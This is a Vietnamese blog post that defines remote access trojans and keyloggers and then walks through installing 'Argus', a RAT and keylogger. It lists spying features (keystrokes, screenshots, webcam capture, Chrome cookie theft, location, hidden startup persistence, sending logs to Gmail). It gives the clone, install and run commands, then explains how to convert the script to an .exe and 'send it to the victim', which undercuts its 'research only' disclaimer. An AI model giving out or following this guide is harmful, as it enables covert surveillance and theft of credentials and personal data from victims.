Rat là gì?
Remote Access Trojan (RAT) là một loại ứng dụng cho phép hacker giám sát và kiểm soát máy tính hoặc mạng của nạn nhân để từ đấy khai thác và đánh cắp các dữ liệu cá nhân của người dùng đồng thời đánh cắp vị trí, môi trường xung quanh bạn và vô vàn thông tin trên máy và mạng của bạn.
Việc các hacker sử dụng Rat với sai mục đích sẽ có hậu quả thích đáng đồng thời khả năng bị phát hiện cũng cao do các chương trình bảo mật tân tiến hiện nay đã có thể dò tìm Rat rất dễ dàng.
Keylog là gì?
Keystroke logging hay Keylog là một đoạn mã do người dùng tạo ra có khả năng ghi lại toàn bộ các hoạt động và thao tác của bàn phím. Đa số việc sử dụng keylog để quản lí máy tính cũng như đảm bảo dữ liệu không bị mất nhưng vẫn có những trường hợp sử dụng keylog để đánh cắp mật khẩu mạng xã hội hay thậm chí thông tin cá nhân và thẻ ngân hàng.
Keylog có thể tồn tại theo nhiều dạng khác nhau bao gồm cả những ứng dụng mã độc hoặc là những thiết bị phần cứng cũng có thể là keylog. Đồng thời keylogger có thể nằm trong các thiết bị điện tử thông minh và thường có xu hướng nằm trong thiết bị di động hoặc đồ dùng IOT.
Argus – phần mềm Rat và Keylogger
Chỉ áp dụng vào mục đích nghiên cứu, nghiêm cấm sử dụng trên máy tính không phải của bạn.
Argus là 1 phần mềm cho phép bạn có thể RAT và Keylogger trên máy tính nạn nhận. Hiện tại phần mềm chỉ chạy trên 2 hệ điều hành là Window và Mac OS. Khi các bạn sử dụng phần mềm thì hãy nhớ đọc qua điều khoản sử dụng của nhà phát triển
1 số tính năng trên Argus
- Theo dõi thao tác bàn phím
- Chụp màn hình target
- Chụp webcam của target
- Thu thập Cookie và lịch sử của Chrome
- Theo dõi thông tin hệ thống
- Tìm vị trí thiết bị
- Gửi log về gmail của bạn
- Che của sổ của ứng dụng và tự động thêm vào chương trình startup
- Lấy địa chỉ ip (Private và Public)
- Dễ dàng sửa đổi source code
Hướng dẫn cài đặt Argus
Chú ý: Máy tính cần lấy thông tin cần làm theo các bước sau đây và yêu cầu có Microsoft Visual C++ 14.0.
Lưu ý: Thay đổi trong file requirements của cả local và remote:
- từ
client==0.01thànhclients opencv-python==4.2.0.34thànhopencv-pythonnumpy==1.18.4thànhnumpypywin32==227thànhpywin32
Cách 1: Làm thủ công
Bước 1:Các bản tải trực tiếp file về tại đây.
Bước 2: Các bạn vào thư mục Argus (lưu ý chọn đúng hệ điều hành)
Bước 3: Các bạn vào terminal, ghi lệnh sau: pip3 install -r requirements.txt
Cách 2: Nhập lệnh sau vào terminal
git clone https://github.com/ALDON94/argus.git
cd Argus/Windows/bin/Local hoặc cd Argus/Windows/bin/Remote
pip3 install -r requirements.txt
python3 win-local.py hoặc python3 win-remote.py
Bây giờ các bạn khởi động file lên là có thể theo dõi máy chứa file python đấy rồi.
Chú ý: File local là keylogger và file remote là file rat
File log sau khi khởi đông file local:
Lưu ý: Trước khi chạy file remote.py(dùng để RAT máy tính) thì thay đổi email và pass vào dòng số 232
Hướng dẫn chuyển file py thành file exe
Bước 1: Tải pyinstaller bằng lệnh sau
pip3 install pyinstaller
Bước 2: nhập lệnh sau
pyinstaller --onefile [Tên file]
Bước 3: các bạn vào thư mục chứa file kia và sẽ thấy file có đuôi .EXE thì đấy là file bạn vừa convert sang. Bạn chỉ cần gửi nó cho nạn nhân là được
Đăng nhận xét